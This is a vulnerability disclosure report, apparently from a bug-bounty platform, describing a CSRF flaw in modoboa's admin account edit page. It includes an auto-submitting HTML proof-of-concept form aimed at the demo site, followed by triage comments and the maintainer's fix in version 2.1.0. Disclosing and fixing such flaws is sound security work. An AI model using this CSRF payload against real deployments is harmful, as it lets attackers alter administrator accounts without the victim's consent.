CSRF leading to edit admin accounts in modoboa/modoboa

Valid

Reported on

Feb 26th 2023


Description

GET /admin/accounts/{id}/edit/?active_tab=default page is vulnerable to a CSRF attack.

Proof of Concept

Login as admin. try to edit admin accounts (example id=4) Open the following file in the browser.

<!DOCTYPE html> <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://demo.modoboa.org/admin/accounts/4/edit/"> <input type="hidden" name="active_tab" value="default" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>

Impact

Attacker would be forced to edit& update admin accounts

We are processing your report and will contact the modoboa team within 24 hours. 2 months ago
Antoine Nguyen validated this vulnerability 2 months ago
memmedrehimzade has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
memmedrehimzade
2 months ago

Researcher


Can you assign a CVE please?

memmedrehimzade
2 months ago

Researcher


any update?

memmedrehimzade
a month ago

Researcher


@admin

Ben Harvie
21 days ago

Admin


The maintainer has the power to assign a CVE during the fix and publish stages.

Antoine Nguyen marked this as fixed in 2.1.0 with commit 5d886f 20 days ago
Antoine Nguyen has been awarded the fix bounty
This vulnerability has been assigned a CVE
Antoine Nguyen published this vulnerability 20 days ago
to join this conversation